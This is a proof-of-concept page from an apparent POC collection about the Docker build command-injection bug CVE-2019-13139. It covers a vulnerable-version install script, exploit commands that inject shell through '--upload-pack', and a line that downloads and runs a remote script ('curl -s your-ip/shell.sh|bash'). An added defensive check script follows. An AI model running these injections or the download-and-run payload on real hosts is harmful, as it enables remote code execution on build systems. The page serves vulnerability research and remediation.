Awesome-POC/云安全漏洞/Docker build 漏洞导致命令执行 CVE-2019-13139.md
2025-04-21 17:36:11 +08:00


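# Docker build Command Execution Vulnerability CVE-2019-13139
## Description
When a local image is built with `docker build`, a remote URL can be supplied as the build context, and that remote build context can be a git repository.
In Docker versions before 18.9.4, the parsing of `remoteUrl` during `docker build` is flawed, so part of the string in `remoteUrl` is executed as a command.
References: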
- https://nvd.nist.gov/vuln/detail/CVE-2019-13139
- https://staaldraad.github.io/post/2019-07-16-cve-2019-13139-docker-build/
- https://github.com/Metarget/metarget
## Affected Versions
```
Docker < 18.9.4
```
## Environment Setup
On Ubuntu 18.04, use the following script, `install_docker_18.09.03.sh`, to install Docker 18.9.3:
```
#!/bin/bash
set -e
echo "[*] Removing old Docker versions (if any)..."
sudo apt remove -y docker docker-engine docker.io containerd runc || true
echo "[*] Removing incorrect Docker sources..."
sudo rm -f /etc/apt/sources.list.d/docker.list || true
sudo sed -i '/download.docker.com/d' /etc/apt/sources.list
echo "[*] Adding Tsinghua University Docker mirror GPG key..."
wget -qO - https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu/gpg | sudo apt-key add -
echo "[*] Adding Tsinghua University Docker mirror repository..."
echo "deb [arch=amd64] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu bionic stable" \
| sudo tee /etc/apt/sources.list.d/docker.list
echo "[*] Updating package index..."
sudo apt update
echo "[*] Searching for Docker 18.09.3..."
VERSION_STRING=$(apt-cache madison docker-ce | grep 18.09.3 | head -n1 | awk '{print $3}')
if [ -z "$VERSION_STRING" ]; then
    echo "[*] Docker 18.09.3 not found"
    exit 1
fi
echo "[*] Found version: $VERSION_STRING"
echo "[*] Installing Docker version $VERSION_STRING ..."
sudo apt install -y "docker-ce=$VERSION_STRING" "docker-ce-cli=$VERSION_STRING" containerd.io
echo "[*] Locking version to prevent automatic updates..."
sudo apt-mark hold docker-ce docker-ce-cli containerd.io
echo "[*] Installation complete, current version:"
docker --version
```
![](images/Docker%20build%20漏洞导致命令执行%20CVE-2019-13139/image-20250421090739097.png)
## Reproduction
Run the exploit command. It reports an error, but that does not affect the result:
```
docker build "git@g.com/a/b#--upload-pack=touch 13139.txt;:"
```
Check whether the command executed successfully:
```
ls | grep 13139
------
13139.txt
```
![](images/Docker%20build%20漏洞导致命令执行%20CVE-2019-13139/image-20250421090836057.png)
Download a remote shell script and execute it:
```
# port must be 80
docker build "git@github.com/a/b#--upload-pack=curl -s your-ip/shell.sh|bash;#:"
```
![](images/Docker%20build%20漏洞导致命令执行%20CVE-2019-13139/image-20250421092642068.png)
## Remediation
- Upgrade to the latest version: https://docs.docker.com/engine/release-notes/
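
A pre-build check for hosts or CI runners that cannot be upgraded right away, given here as an added example that is not from the original page or from Docker: it flags versions in the page's `< 18.9.4` range and refuses build contexts whose `#ref` part starts with `-`, the shape both commands in the reproduction section rely on. The function names are hypothetical, and the split follows Docker's `remote#ref:subdir` build-context syntax.

```shell
#!/bin/sh
# Added example, not part of the original page; function names are hypothetical.

# Print the ref part of a build context written as remote#ref:subdir.
context_ref() {
    case "$1" in
        *'#'*) frag=${1#*\#} ;;   # text after the first '#'
        *)     frag='' ;;
    esac
    printf '%s\n' "${frag%%:*}"   # the ref ends at the first ':'
}

# Succeed only if the ref cannot be read by git as an option.
# Spaces are refused too, since git ref names cannot contain them.
context_is_safe() {
    ref=$(context_ref "$1")
    case "$ref" in
        -*|*' '*) return 1 ;;
    esac
    return 0
}

# Succeed if a version such as 18.09.3 or 17.12.1-ce is below 18.09.4.
docker_version_affected() {
    IFS=. read -r major minor patch extra <<EOF
${1%%[-+~]*}
EOF
    major=${major#0}; minor=${minor#0}; patch=${patch#0}
    major=${major:-0}; minor=${minor:-0}; patch=${patch:-0}
    [ "$major" -lt 18 ] && return 0
    [ "$major" -gt 18 ] && return 1
    [ "$minor" -lt 9 ] && return 0
    [ "$minor" -gt 9 ] && return 1
    [ "$patch" -lt 4 ]
}

# Constructed sample contexts (example.com is a placeholder host).
for ctx in 'https://example.com/team/app.git#v1.2:docker' \
           'git@example.com/team/app#--opt=value:'; do
    if context_is_safe "$ctx"; then echo "ok      $ctx"; else echo "REJECT  $ctx"; fi
done
```

On a real host, pass the output of `docker version --format '{{.Server.Version}}'` to `docker_version_affected`, and call `context_is_safe` on any build context that comes from a job parameter before it reaches `docker build`.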